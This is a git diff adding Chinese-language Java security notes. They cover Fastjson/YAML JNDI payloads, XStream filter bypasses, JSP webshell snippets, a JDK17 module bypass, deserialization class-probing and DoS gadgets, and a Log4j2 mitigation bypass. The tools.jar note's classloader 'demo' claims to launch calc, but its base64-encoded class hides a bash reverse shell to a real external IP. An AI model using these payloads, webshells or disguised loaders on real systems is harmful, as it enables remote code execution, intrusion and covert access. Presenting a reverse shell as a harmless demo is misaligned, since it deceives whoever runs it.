@@ yaml的双引号中可以使用16进制编码和unicode编码, {"name":{"\x40\x74\x79\x70\x65":"java.lang.Class","val":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"},"x":{"\x40\x74\x79\x70\x65":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","dataSourceName":"ldap://xxx.xxx.xxx.xxxs:1389/Exploit","\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74":true}} +``` +2021/10/7更新 +### XStream +```xml +1. 16进制绕过 + + + +当前黑名单为org[.]springframework,此时的绕过方法可以为 + + + +2. 针对标签属性内容的绕过 + + + +此时的黑名单为custom,那么绕过方法可以为 + + + +原理为读取属性内容时,会做符合要求的转化 + +3. 针对标签内容的绕过 + +ldap://xxxxx + +此时的黑名单为ldap://,可以用如下的几种方法绕过 + +html编码: +这部分在提取数据时,同样对html编码的内容做了转化 + +ldap://xxxxx + + +注释的方法: +在处理实际的标签内容时,遇到注视内容将被忽略掉 + +ldap://xxxxx + + + ``` diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" new file mode 100644 index 0000000..dbd2d4e --- /dev/null +++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" @@ -0,0 +1,99 @@ +# jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + +![image-20221220230825845](img/image-20221220230825845.png) + +限制了 + +![image-20221220233047039](img/image-20221220233047039.png) + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + diff --git "a/java\346\227\245\345\270\270/jsp\346\240\207\347\255\276\347\273\225\350\277\207.md" "b/java\346\227\245\345\270\270/jsp\346\240\207\347\255\276\347\273\225\350\277\207.md" new file mode 100644 index 0000000..644551e --- /dev/null +++ "b/java\346\227\245\345\270\270/jsp\346\240\207\347\255\276\347\273\225\350\277\207.md" @@ -0,0 +1,27 @@ +# jsp标签绕过 + +## el表达式 + +``` +${Runtime.getRuntime().exec(param.cmd)} +``` + +## jspx利用命名空间绕过 + +```jsp + + + Runtime.getRuntime().exec(request.getParameter('cmd')) + + +``` + +## jspx利用绕过 + +```jsp + + + Runtime.getRuntime().exec(request.getParameter('cmd')) + + +``` diff --git "a/java\346\227\245\345\270\270/searchobj.md" "b/java\346\227\245\345\270\270/searchobj.md" new file mode 100644 index 0000000..8a2bf47 --- /dev/null +++ "b/java\346\227\245\345\270\270/searchobj.md" @@ -0,0 +1,82 @@ +# seacherobj + +>学习一下searcherobj的方法 +> +> https://blog.csdn.net/dhklsl/article/details/83992950 +> +>https://blog.csdn.net/dhklsl/article/details/84751008 +> +>https://blog.csdn.net/dhklsl/article/details/88245460 + +## 递归 + +一个一个的去寻找 + +```java +/** + * 判断是否是List或者ArrayList + * @param field + * @return + */ +public static boolean isList(Field field){ + boolean flag = false; + String simpleName = field.getType().getSimpleName(); + if ("List".equals(simpleName) || "ArrayList".equals(simpleName)){ + flag = true; + } + return flag; +} +/** + * 判断是否是Map或者HashMap + * @param field + * @return + */ +public static boolean isMap(Field field){ + boolean flag = false; + String simpleName = field.getType().getSimpleName(); + if ("Map".equals(simpleName) || "HashMap".equals(simpleName)){ + flag = true; + } + return flag; +} +/** + * 检查object是否为java的基本数据类型 + * @param object + * @return + */ +public static boolean checkObjectIsSysType(Object object) { + String objType = object.getClass().toString(); + if ("byte".equals(objType) || "short".equals(objType) || "int".equals(objType) || "long".equals(objType) || "double".equals(objType) || "float".equals(objType) || "boolean".equals(objType)) { + return true; + } else { + return false; + } +} +``` + +## json截取 + +思想非常简单就是将对象转换成json数据,然后在去截断我们需要的属性 + +```java +/** + * 方法二:从复杂对象中获取string类型的目标属性targetProName的值 + * 把对象转换成json字符串,然后截取第一次出现的targetProName的值 + * 适用条件:同方法一 + * @param object 复杂对象 + * @param targetProName 目标属性 + * @return + */ +public static String getBusinessNoFromArg(Object object,String targetProName){ + String jsonString = JSON.toJSONString(object); + System.err.println("jsonString=" + jsonString); + jsonString = StringUtils.substringAfter(jsonString,"\""+targetProName + "\":\"");//去截断目标属性 + jsonString = StringUtils.substringBefore(jsonString,"\""); + return jsonString; +} +``` + + + + + diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file diff --git "a/java\346\227\245\345\270\270/unsafe\345\255\246\344\271\240.md" "b/java\346\227\245\345\270\270/unsafe\345\255\246\344\271\240.md" new file mode 100644 index 0000000..b0bc74f --- /dev/null +++ "b/java\346\227\245\345\270\270/unsafe\345\255\246\344\271\240.md" @@ -0,0 +1,77 @@ +# unsafe学习 + +## 获取偏移量方法 + +```java +public native long objectFieldOffset(Field var1);//获取非静态变量var1的偏移量。 +public native long staticFieldOffset(Field var1);//获取静态变量var1的偏移量。 +public native int arrayBaseOffset(Class var1);//获取数组var1中的第一个元素的偏移量,即数组的基础地址。 +public native Object staticFieldBase(Field var1);//获取静态变量var1的实际地址,配合staticFieldOffset方法使用,可求出变量所在的段地址 +public native int arrayIndexScale(Class var1);//获取数组var1的偏移量增量。结合arrayBaseOffset(Class var1)方法就可以求出数组中各个元素的地址。 +``` + + + +## 操作属性方法 + +```java +public native Object getObject(Object var1, long var2);//获取var1对象中偏移量为var2的Object对象,该方法可以无视修饰符限制。相同方法有getInt、getLong、getBoolean等。 +public native void putObject(Object var1, long var2, Object var4);//将var1对象中偏移量为var2的Object对象的值设为var4,该方法可以无视修饰符限制。相同的方法有putInt、putLong、putBoolean等。 +public native Object getObjectVolatile(Object var1, long var2);//功能与getObject(Object var1, long var2)一样,但该方法可以保证读写的可见性和有序性,可以无视修饰符限制。相同的方法有getIntVolatile、getLongVolatile、getBooleanVolatile等。 +public native void putObjectVolatile(Object var1, long var2, Object var4);//功能与putObject(Object var1, long var2, Object var4)一样,但该方法可以保证读写的可见性和有序性,可以无视修饰符限制。相同的方法有putIntVolatile、putLongVolatile、putBooleanVolatile等。 +public native void putOrderedObject(Object var1, long var2, Object var4);//功能与putObject(Object var1, long var2, Object var4)一样,但该方法可以保证读写的有序性(不保证可见性),可以无视修饰符限制。相同的方法有putOrderedInt、putOrderedLong等。 +``` + +## 操作内存方法 + +```java +public native int addressSize();//获取本地指针大小,单位为byte,通常值为4或8。 +public native int pageSize();//获取本地内存的页数,该返回值会是2的幂次方。 +public native long allocateMemory(long var1);//开辟一块新的内存块,大小为var1(单位为byte),返回新开辟的内存块地址。 +public native long reallocateMemory(long var1, long var3);//将内存地址为var3的内存块大小调整为var1(单位为byte),返回调整后新的内存块地址。 +public native void setMemory(long var2, long var4, byte var6);//从实际地址var2开始将后面的字节都修改为var6,修改大小为var4(通常为0)。 +public native void copyMemory(Object var1, long var2, Object var4, long var5, long var7);//从对象var1中偏移量为var2的地址开始复制,复制到var4中偏移量为var5的地址,复制大小为var7。当var1为空时,var2就不是偏移量而是实际地址,当var4为空时,var5就不是偏移量而是实际地址。 +public native void freeMemory(long var1);//释放实际地址为var1的内存。 +``` + +## 线程挂起和恢复方法 + +```java +public native void unpark(Object var1);//将被挂起的线程var1恢复,由于其不安全性,需保证线程var1是存活的。 +public native void park(boolean var1, long var2);//当var2等于0时,线程会一直挂起,知道调用unpark方法才能恢复。当var2大于0时,如果var1为false,这时var2为增量时间,即线程在被挂起var2秒后会自动恢复,如果var1为true,这时var2为绝对时间,即线程被挂起后,得到具体的时间var2后才自动恢复。 +``` + +## CAS方法 + +```java +public final native boolean compareAndSwapObject(Object var1, long var2, Object var4, Object var5);//CAS机制相关操作,对对象var1里偏移量为var2的变量进行CAS修改,var4为期待值,var5为修改值,返回修改结果。相同方法有compareAndSwapInt、compareAndSwapLong。 +``` + +## 类加载方法 + +```java +public native boolean shouldBeInitialized(Class var1);//判断var1类是否被初始。 +public native void ensureClassInitialized(Class var1);//确保var1类已经被初始化。 +public native Class defineClass(String var1, byte[] var2, int var3, int var4, ClassLoader var5, ProtectionDomain var6);//定义一个类,用于动态的创建类。var1为类名,var2为类的文件数据字节数组,var3为var2的输入起点,var4为输入长度,var5为加载该类的加载器,var6为保护领域。返回创建后的类。 +public native Class defineAnonymousClass(Class var1, byte[] var2, Object[] var3);//用于动态的创建匿名内部类。var1为需创建匿名内部类的类,var2为匿名内部类的文件数据字节数组,var3为修补对象。返回创建后的匿名内部类。 +public native Object allocateInstance(Class var1) throws InstantiationException;//创建var1类的实例,但是不会调用var1类的构造方法,如果var1类还没有初始化,则进行初始化。返回创建实例对象。 +``` + +## 内存屏障方法 + +```java +public native void loadFence();//所有读操作必须在loadFence方法执行前执行完毕。 +public native void storeFence();//所有写操作必须在storeFence方法执行前执行完毕。 +public native void fullFence();//所有读写操作必须在fullFence方法执行前执行完毕。 +``` + +>https://www.cnblogs.com/gaofei200/p/13951764.html +> +>https://tech.meituan.com/2019/02/14/talk-about-java-magic-class-unsafe.html + + + + + + + diff --git "a/java\346\227\245\345\270\270/wsdl.md" "b/java\346\227\245\345\270\270/wsdl.md" new file mode 100644 index 0000000..fb556c9 --- /dev/null +++ "b/java\346\227\245\345\270\270/wsdl.md" @@ -0,0 +1,71 @@ +# wsdl 相关 + +## 恢复成java代码 + +``` +wsimport -keep "test.wsdl" -p com.test -extension + +常用参数为: +-d<目录> - 将生成.class文件。默认参数。 +-s<目录> - 将生成.java文件。 +-p<生成的新包名> -将生成的类,放于指定的包下,自定义包结构。 +(wsdlurl) - http://server:port/service?wsdl,必须的参数。 +示例: +C:/> wsimport –s . +C:/> wsimport –s . –p com.sitech.web + + +注意:-s不能分开,-s后面有个小点,用于指定源代码生成的目录。点即当前目录。 +如果使用了-s参数则会在目录下生成两份代码,一份为.class代码。一份为.java代码。 +.class代码,可以经过打包以后使用。.java代码可以直接Copy到我们的项目中运行。 +``` + + + +## 客户端调用 + +```xml + + org.apache.cxf + cxf-rt-frontend-jaxws + 3.4.5 + + + + org.apache.cxf + cxf-rt-transports-http + 3.4.5 + +``` + +java代码 + +```java +import org.apache.cxf.endpoint.Client; +import org.apache.cxf.jaxws.endpoint.dynamic.*; + +import java.util.Arrays; + +/** + *https://www.programcreek.com/java-api-examples/?api=org.apache.cxf.jaxws.endpoint.dynamic.JaxWsDynamicClientFactory + */ +public class Main { + public static void main(String[] args) { + JaxWsDynamicClientFactory factory = JaxWsDynamicClientFactory.newInstance(); + Client client = factory.createClient("http://1.116.136.120:58081/admin/service/UserService?wsdl"); + try { + Object[] objects = client.invoke("sayHello","admin"); + Arrays.stream(objects).forEach(System.out::println); + client.destroy(); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +## 参考 + +>https://blog.51cto.com/u_15127638/2751110 +>https://blog.csdn.net/qq_32447301/article/details/79204311 +>http://www.360doc.com/content/17/0105/20/835902_620335609.shtml diff --git "a/java\346\227\245\345\270\270/\346\236\204\351\200\240java\346\216\242\346\265\213class\345\217\215\345\272\217\345\210\227\345\214\226gadget\347\232\204\346\200\235\350\200\203.md" "b/java\346\227\245\345\270\270/\346\236\204\351\200\240java\346\216\242\346\265\213class\345\217\215\345\272\217\345\210\227\345\214\226gadget\347\232\204\346\200\235\350\200\203.md" new file mode 100644 index 0000000..c6d66fb --- /dev/null +++ "b/java\346\227\245\345\270\270/\346\236\204\351\200\240java\346\216\242\346\265\213class\345\217\215\345\272\217\345\210\227\345\214\226gadget\347\232\204\346\200\235\350\200\203.md" @@ -0,0 +1,191 @@ +# 构造java探测class反序列化gadget的思考 + +[构造java探测class反序列化gadget](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247484178&idx=1&sn=228ccc3d624f2d64a6c1d51555c42eea&chksm=cf36fb52f8417244ea608ea14da45b876548617864179c8da6df46010bed78aa41c4a2277cb8&mpshare=1&scene=23&srcid=1231zSEsxQMxcrllvqoBgmcY&sharer_sharetime=1640932147710&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +这篇文章是2021年最后一天读的,非常好。这让我对2022充满希望。谢谢师傅提供的好思路。 + +## urldns + +通过urldns去判断是不是存在 + +```java +/** +* 生成我们需要的空类 +**/ +public static Class makeClass(String clazzName) throws Exception{ + ClassPool classPool = ClassPool.getDefault(); + CtClass ctClass = classPool.makeClass(clazzName); + Class clazz = ctClass.toClass(); + ctClass.defrost(); + return clazz; +} +``` + +poc + +```java +@Authors({ Authors.NOPOINT,Authors.C0NY1 }) +public class FindClassByDNS implements ObjectPayload { + public Object getObject(final String command) throws Exception { + String[] cmds = command.split("\\|"); + if(cmds.length != 2){ + System.out.println("|"); + return null; + } + String url = cmds[0]; + String clazzName = cmds[1]; + URLStreamHandler handler = new SilentURLStreamHandler(); + HashMap ht = new HashMap(); + URL u = new URL(null, url, handler); + // 以URL对象为key,以探测Class为value + ht.put(u, makeClass(clazzName));// + Reflections.setFieldValue(u, "hashCode", -1); + return ht; + } +} +``` + +**如果环境没有dns解析就不行咯** + +## Dos + +https://blog.csdn.net/fnmsd/article/details/115672540 + +https://blog.csdn.net/nevermorewo/article/details/100100048 + +https://github.com/jbloch/effective-java-3e-source-code/blob/master/src/effectivejava/chapter12/item85/DeserializationBomb.java + +**通过构造特殊的多层嵌套HashSet,导致服务器反序列化的时间复杂度提升,消耗服务器所有性能,导致拒绝服务。在这个基础上,我选择消耗部分性能达到间接延时的作用,来探测class。** + +```java +@Authors({ Authors.C0NY1 }) +public class FindClassByBomb extends PayloadRunner implements ObjectPayload { + + public Object getObject ( final String command ) throws Exception { + int depth; + String className = null; + + if(command.contains("|")){ + String[] x = command.split("\\|"); + className = x[0]; + depth = Integer.valueOf(x[1]); + }else{ + className = command; + depth = 28; + } + + Class findClazz = makeClass(className); + Set root = new HashSet(); + Set s1 = root; + Set s2 = new HashSet(); + for (int i = 0; i < depth; i++) { + Set t1 = new HashSet(); + Set t2 = new HashSet(); + t1.add(findClazz);//不存在类就抛出异常 + s1.add(t1); + s1.add(t2); + s2.add(t1); + s2.add(t2); + s1 = t1; + s2 = t2; + } + return root; + } +} +``` + +经过师傅的实战一般这个深度都在25到28之间,切记不要设置太大否则造成DOS。 + +不过可以通过jep290继续防御 + +``` +-Djdk.serialFilter=maxarray=100000;maxdepth=20 +``` + + + +## class checklist + +要想在实战中使用,我们就需要事先去制作一份class的checklist备用。下面我通过diff maven中央仓库的统计的结果。最新的checklist和gadget都更新到ysoserial-for-woodpecker项目。 + +**6.1 CommonsCollections** + +必须存在类:org.apache.commons.collections.functors.ChainedTransformer + + + +| 版本范围 | 漏洞版本 | 判断类 | suid冲突 | +| :------------------: | :----------------------------------------------------: | :----: | :------: | +| >= 3.1 or = 20040616 | org.apache.commons.collections.list.TreeList | 是 | 无 | +| >= 3.2.2 | org.apache.commons.collections.functors.FunctorUtils$1 | 否 | 无 | + + + +**6.2 CommonsCollections4** + +必须存在类:org.apache.commons.collections4.comparators.TransformingComparator + +| 版本范围 | 漏洞版本 | 判断类 | suid冲突 | +| :------: | :------: | :--------------------------------------------------: | :------: | +| >= 4.1 | 否 | 存在org.apache.commons.collections4.FluentIterable | 无 | +| 4.0 | 否 | 不存在org.apache.commons.collections4.FluentIterable | 无 | + + + +**6.3 CommonsBeanutils** + +必须存在类:org.apache.commons.beanutils.BeanComparator + + + +| 版本范围 | 漏洞版本 | 判断类 | suid冲突 | +| :-------------------------------: | :------: | :-----------------------------------------------: | :------------------: | +| >= 1.9.0 | 是 | 存在org.apache.commons.beanutils.BeanIntrospector | -2044202215314119608 | +| 1.7.0 <= <= 1.8.3 | 是 | 存在org.apache.commons.collections.Buffer | -3490850999041592962 | +| >= 1.6 or = 20030211.134440 | 是 | 存在org.apache.commons.beanutils.ConstructorUtils | 2573799559215537819 | +| >= 1.5 or 20021128.082114 > 1.4.1 | 是 | 存在org.apache.commons.beanutils.BeanComparator | 5123381023979609048 | + +**6.4 c3p0** + +必须存在:org.apache.commons.beanutils.BeanComparator + + + +| 版本范围 | 漏洞版本 | 判断类 | suid冲突 | +| :-----------------------------: | :------: | :-------------------------------------------------: | :------------------: | +| 0.9.5-pre9 ~ 0.9.5.5 | 是 | 存在com.mchange.v2.c3p0.test.AlwaysFailDataSource | -2440162180985815128 | +| 0.9.2-pre2-RELEASE ~ 0.9.5-pre8 | 是 | 不存在com.mchange.v2.c3p0.test.AlwaysFailDataSource | 7387108436934414104 | + + + +以c3p0为例子,我们判断的步骤应该是 + + + +1. 第一步判断com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase是否存在,若存在C3P0可用 + +2. 第二步判断com.mchange.v2.c3p0.test.AlwaysFailDataSource是否存在,存在说明是高版本,suid切换-2440162180985815128。否则切换7387108436934414104 + + + +## 思考 + +1. Oracle jdk or Open jdk + +2. 是jre还是jdk + +3. 中间件类型(辅助构造回显/内存马) + +4. 使用的web框架 + +5. BCEL classloader是否存在 **com.sun.org.apache.bcel.internal.util.ClassLoader** + +6. 判断java版本是否低于<7u104(该版本可以00截断) + +7. ...... + +本来想继续去寻找的可是有点累了,以后有时间去弄吧。。。。。respect + +参考 + +>[构造java探测class反序列化gadget](https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247484178&idx=1&sn=228ccc3d624f2d64a6c1d51555c42eea&chksm=cf36fb52f8417244ea608ea14da45b876548617864179c8da6df46010bed78aa41c4a2277cb8&mpshare=1&scene=23&srcid=1231zSEsxQMxcrllvqoBgmcY&sharer_sharetime=1640932147710&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) diff --git "a/java\346\227\245\345\270\270/\346\267\261\345\205\245\345\255\246\344\271\240tomcat.md" "b/java\346\227\245\345\270\270/\346\267\261\345\205\245\345\255\246\344\271\240tomcat.md" new file mode 100644 index 0000000..df745a1 --- /dev/null +++ "b/java\346\227\245\345\270\270/\346\267\261\345\205\245\345\255\246\344\271\240tomcat.md" @@ -0,0 +1,51 @@ +# 深入学习tomcat + +## tomcat核心组件 + +![image-20220204195334994](img/image-20220204195334994.png) + +## 核心组件的协助过程 + +![image-20220204195638435](img/image-20220204195638435.png) + +## conf/server.xml + +```xml + + + + + + + + + + + + + + + + + + + + + +``` + +## tomcat请求流程 + +![image-20220204210315090](img/image-20220204210315090.png) + +### Pipeline结构 + +![image-20220204210545634](img/image-20220204210545634.png) + +每次在配置中添加value是在默认的pipeline的前面。 + +也就是tomcat的每一个组件之间的相互调用是通过pipeline去实现的 + diff --git "a/java\346\227\245\345\270\270/\350\247\243\345\206\263agent\344\270\255tools\345\212\240\350\275\275\347\232\204\351\227\256\351\242\230.md" "b/java\346\227\245\345\270\270/\350\247\243\345\206\263agent\344\270\255tools\345\212\240\350\275\275\347\232\204\351\227\256\351\242\230.md" new file mode 100644 index 0000000..a13a32e --- /dev/null +++ "b/java\346\227\245\345\270\270/\350\247\243\345\206\263agent\344\270\255tools\345\212\240\350\275\275\347\232\204\351\227\256\351\242\230.md" @@ -0,0 +1,86 @@ +# 解决agent中tools加载的问题 + +为什么有这个文章?因为我们在利用agent中的运行中attach pid需要利用到tools.jar的类不过默认java是不加载tools.jar类的所以我们需要解决它 + +解决方法是学大师傅们的方法的。 + +## 方法一 + +URLClassLoader去加载tools.jar路径并且将需要的类添加到map中,然后通过反射去实现。 + +代码:https://gist.github.com/Firebasky/c1efd9dc7eb964a77cb788c170a8598f + +```java +java.io.File toolsPath = new java.io.File(System.getProperty("java.home").replace("jre", "lib") + java.io.File.separator + "tools.jar"); +java.net.URL url = toolsPath.toURI().toURL(); +//URL url1 = new URL("file:C:\\Program Files\\java\\jdk1.8.0_201\\lib\\tools.jar"); +URLClassLoader urlClassLoader = new URLClassLoader(new URL[] { url }, Thread.currentThread().getContextClassLoader()); +``` + +## 方法二 + +自定义加载器 + +https://xz.aliyun.com/t/10075#toc-4 + +>自定义的classLoader。但是我们都知道classLoader在loadClass的时候采用双亲委托机制,也就是如果系统中已经存在一个类,即使我们用自定义的classLoader去loadClass,也会返回系统内置的那个类。但是如果我们绕过loadClass,直接去defineClass即可从我们指定的字节码数组里创建类,而且类名我们可以任意自定义,重写java.lang.String都没问题:) 然后再用defineClass返回的Class去实例化。 + +demo + +```java +package sun.tools.attach; + +import java.io.IOException; + +public class VirtualMachine { + public static void execute(String cmd){ + try{ + Runtime.getRuntime().exec(new String[]{"/bin/bash","-c",cmd}); + }catch (IOException e){ + try{ + Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd}); + }catch (IOException ee){ + } + } + } +} +``` + + + +```java +package com.firebasky.demo2; + +import java.lang.reflect.Method; +import java.util.Base64; + +public class poc { + + public static class Myloader extends ClassLoader //继承ClassLoader + { + public Class get(byte[] b) {//直接使用defineClass返回class对象 + return super.defineClass(b, 0, b.length); + } + } + + public static void main(String[] args) + { + try { + String classStr="yv66vgAAADkALgoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCgAIAAkHAAoMAAsADAEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwcADgEAEGphdmEvbGFuZy9TdHJpbmcIABABAAkvYmluL2Jhc2gIABIBAAItYwgAFAEAVmV4ZWMgNTw+L2Rldi90Y3AvMS4xMTYuMTM2LjEyMC8yMzMzO2NhdCA8JjUgfCB3aGlsZSByZWFkIGxpbmU7IGRvICRsaW5lIDI+JjUgPiY1OyBkb25lCgAIABYMABcAGAEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7BwAaAQATamF2YS9pby9JT0V4Y2VwdGlvbggAHAEAA2NtZAgAHgEAAi9jBwAgAQAtY29tL2ZpcmViYXNreS9zdW4vdG9vbHMvYXR0YWNoL1ZpcnR1YWxNYWNoaW5lAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAC9MY29tL2ZpcmViYXNreS9zdW4vdG9vbHMvYXR0YWNoL1ZpcnR1YWxNYWNoaW5lOwEAB2V4ZWN1dGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQEAClNvdXJjZUZpbGUBABNWaXJ0dWFsTWFjaGluZS5qYXZhACEAHwACAAAAAAACAAEABQAGAAEAIQAAAC8AAQABAAAABSq3AAGxAAAAAgAiAAAABgABAAAABQAjAAAADAABAAAABQAkACUAAAAJACYAJwABACEAAAC3AAUAAwAAADy4AAcGvQANWQMSD1NZBBIRU1kFEhNTtgAVV6cAIUy4AAcGvQANWQMSG1NZBBIdU1kFKlO2ABVXpwAETbEAAgAAABoAHQAZAB4ANwA6ABkAAwAiAAAAHgAHAAAACAAaAA4AHQAJAB4ACwA3AA0AOgAMADsADwAjAAAAFgACAB4AHQAoACkAAQAAADwAHAAqAAAAKwAAABkAA10HABn/ABwAAgcADQcAGQABBwAZ+gAAAAEALAAAAAIALQ=="; + Class result = new Myloader().get(Base64.getDecoder().decode(classStr)); + for (Method m:result.getDeclaredMethods()) + { + System.out.println(m.getName()); + if (m.getName().equals("execute")) + { + m.invoke(result,"calc"); + } + } + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +不得不佩服大师傅啊!!! diff --git "a/java\346\227\245\345\270\270/\351\227\262\350\260\210log4j2.md" "b/java\346\227\245\345\270\270/\351\227\262\350\260\210log4j2.md" new file mode 100644 index 0000000..3f2b0b3 --- /dev/null +++ "b/java\346\227\245\345\270\270/\351\227\262\350\260\210log4j2.md" @@ -0,0 +1,238 @@ +# 闲谈log4j2 + +## log4j2爆炸漏洞 + +简单的说一下最近这个log4j2漏洞吧,这个漏洞自己也跟了有一段时间了。第一次在学长那听到了这个漏洞,当时只是跟但了jndi注入点并没有发现漏洞的入口,也就是${jndi:ldap://127.0.0.1/exp}.一方面是没有想到这个功能,但是之后感觉官方文档里面说了[文档](https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup),可能是自己语文水平不太好。(有点吃亏。。。 + +## 挖掘新问题 + +然后就是复现漏洞。挖新的问题。当时第一时间感觉这个东西肯定有问题,第一时间就想到了dos。 + +![image-20211218215051277](https://user-images.githubusercontent.com/63966847/146644571-d87566e9-ac55-44f7-aaf3-0a64beb97b01.png) + + +当时因为环境没有配置起就去睡觉了,当时已经是晚上的3点了。 + +说一下我当时发现的dos问题大致是因为数组长度我们可以控制造成溢出。第二天中午我大哥就提交了dos漏洞。之后就没有管了。 + +## 绕过rc1 + +在然后说一下绕过rc1吧这个东西虽然简单但是我调试了一下午,大概是因为对异常没有处理,也就是在catch中没有return,导致程序会继续执行。 + +![Q`X GHE7UL3 IBYUAB0EFW](https://user-images.githubusercontent.com/63966847/146644576-d80164ab-1879-4e01-a50e-626f1c99bf5e.png) + + +所以绕过思路就直接让new url(name) 抛出异常就欧克。 + +tips:和bypass7u21差不多。。。 + +## 修复问题 + +``` +今天看陈师傅写的文章,也就是修复log4j的坑。 +在漏洞报出来的时候修复的方法是: + +1.设置配置文件参数 log4j2.formatMsgNoLookups=true, +2.vm启动环境参数 -Dlog4j2.formatMsgNolookups=true, +3,设置系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true +而这样的修复是打破这个判断 +``` + +![image-20211215142114290](https://user-images.githubusercontent.com/63966847/146644579-6ed47eaf-8666-42ed-be31-7a01d83d860c.png) + + +认真看该代码其实在下面还有一个入口。 + + +![image-20211215142251448](https://user-images.githubusercontent.com/63966847/146644583-ac2f76eb-028d-4afb-8f72-e5848746b49c.png) + +可以看到判断条件是 **msg instanceof StringBuilderFormattable** + +所以可以走第二个入口就绕过了log4j2.formatMsgNoLookups=true的判断 + +```java +log.printf(Level.ERROR,"${jndi:ldap://127.0.0.1:2333}"); +``` + 